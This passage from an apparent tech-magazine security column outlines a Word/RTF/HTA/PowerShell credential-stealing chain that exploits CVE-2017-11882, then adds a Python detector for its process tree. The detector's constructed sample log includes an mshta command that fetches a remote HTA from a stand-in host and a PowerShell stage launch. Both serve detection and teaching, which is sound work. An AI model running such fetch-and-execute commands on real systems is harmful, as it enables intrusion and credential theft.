Then there’s the AROUND operator that looks for words that are close to each other in the message; used with a modifier you could try
AROUND 6 to find the words within six of each other, for example. There’s a whole smorgasbord of search modifiers you can use with Gmail, many of which you’ll find at pcpro.link/284search.
Have a convoluted Word about patching
Credential thieves are always looking for new ways to get your logins, such as using a malicious Word document attached to an email. Hold on, I hear you screaming, that’s hardly new. True, and if this were just another embedded Word Macro threat, I wouldn’t have given it a second glance. However, it isn’t, and it’s interesting to see how complex some people are prepared to be to evade detection.
This threat, which was uncovered by researchers from Trustwave SpiderLabs (pcpro.link/284threat), is so complex that it provides many an opportunity for the attack to go belly-up. Stage one involves the recipient of the spear phishing campaign email opening the infected Word attachment. This then accesses a remote RTF document via an OLE object within the file. That RTF file is then executed to exploit CVE-2017-11882 (pcpro.link/284cve), which uses the Microsoft Equation Editor to run arbitrary code. An ASCII-encoded command line is decoded and executed to launch a Microsoft HTML Application (HTA) that downloads a remote HTA file containing obfuscated VBScript – which, in turn and via a PowerShell script, downloads the password-stealing binary.
So, plenty of steps that can fail along the way and nullify the attack on the victim. If he or she had kept up to date with patches then it would have been dead from the get-go, of course. But – and it’s a big one – by avoiding the usual run of scripting file types and sticking with DOCX, RTF and HTA, there’s less chance of it becoming trapped at the gateway level.
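What slips past the gateway still leaves a very odd process tree on the endpoint, which is where this chain is easiest to catch. The script below is an added example (not from the column or from Trustwave) that scans process-creation events for the tell-tale hops the column describes; it assumes EQNEDT32.EXE is the Equation Editor binary and mshta.exe the HTA host, and all hosts, paths, timestamps and the URL in the sample log are constructed.

```python
import ntpath
from collections import defaultdict

# Constructed process-creation events in a simple 'timestamp|host|parent_image|image|cmdline'
# layout (the kind of data Sysmon Event ID 1 or an EDR agent provides). Hosts, paths and the
# URL are made up for this example; ws-17 shows the chain, ws-22 is a normal Word session.
SAMPLE_LOG = [
    r"2017-12-04T09:12:01Z|ws-17|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|WINWORD.EXE /n invoice.docx",
    r"2017-12-04T09:12:09Z|ws-17|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE|EQNEDT32.EXE -Embedding",
    r"2017-12-04T09:12:10Z|ws-17|C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE|C:\Windows\System32\mshta.exe|mshta.exe http://stage.invalid/x.hta",
    r"2017-12-04T09:12:12Z|ws-17|C:\Windows\System32\mshta.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -NoProfile -File stage2.ps1",
    r"2017-12-04T09:30:00Z|ws-22|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|WINWORD.EXE /n report.docx",
]

def stage_of(parent, child):
    """Classify a parent/child pair, or return None if it looks benign."""
    # EQNEDT32.EXE (assumed name of the Equation Editor binary) only renders equations;
    # it has no business launching anything, so any child is the CVE-2017-11882 tell.
    if parent == "eqnedt32.exe":
        return "equation-editor-spawn"
    # The HTA host handing off to PowerShell is the next hop in the column's chain.
    if parent == "mshta.exe" and child == "powershell.exe":
        return "hta-to-powershell"
    return None

def parse_event(line):
    ts, host, parent, image, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host, "cmdline": cmdline,
            "parent": ntpath.basename(parent).lower(),
            "image": ntpath.basename(image).lower()}

def find_chains(lines):
    """Group suspicious events per host; a host with both stages has the full chain."""
    hits = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        stage = stage_of(ev["parent"], ev["image"])
        if stage:
            hits[ev["host"]].append({"ts": ev["ts"], "stage": stage, "cmdline": ev["cmdline"]})
    return dict(hits)

if __name__ == "__main__":
    for host, events in find_chains(SAMPLE_LOG).items():
        print(f"{host}: {[e['stage'] for e in events]}")
```

Word launching the Equation Editor on its own is not flagged, since that can happen when an old equation is edited; the alert is the Equation Editor spawning anything at all.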